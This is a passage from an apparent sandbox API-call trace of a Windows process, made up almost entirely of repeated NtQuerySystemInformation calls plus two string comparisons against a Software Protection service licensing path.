(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x28, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0295.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0295.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0295.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x28, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0295.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0295.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0295.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x28, ResultLength=0x0) [0295.377] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0295.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x28, ResultLength=0x0) [0295.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0295.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0295.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x28, ResultLength=0x0) [0295.467] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0295.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x28, ResultLength=0x0) [0295.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0295.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0295.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 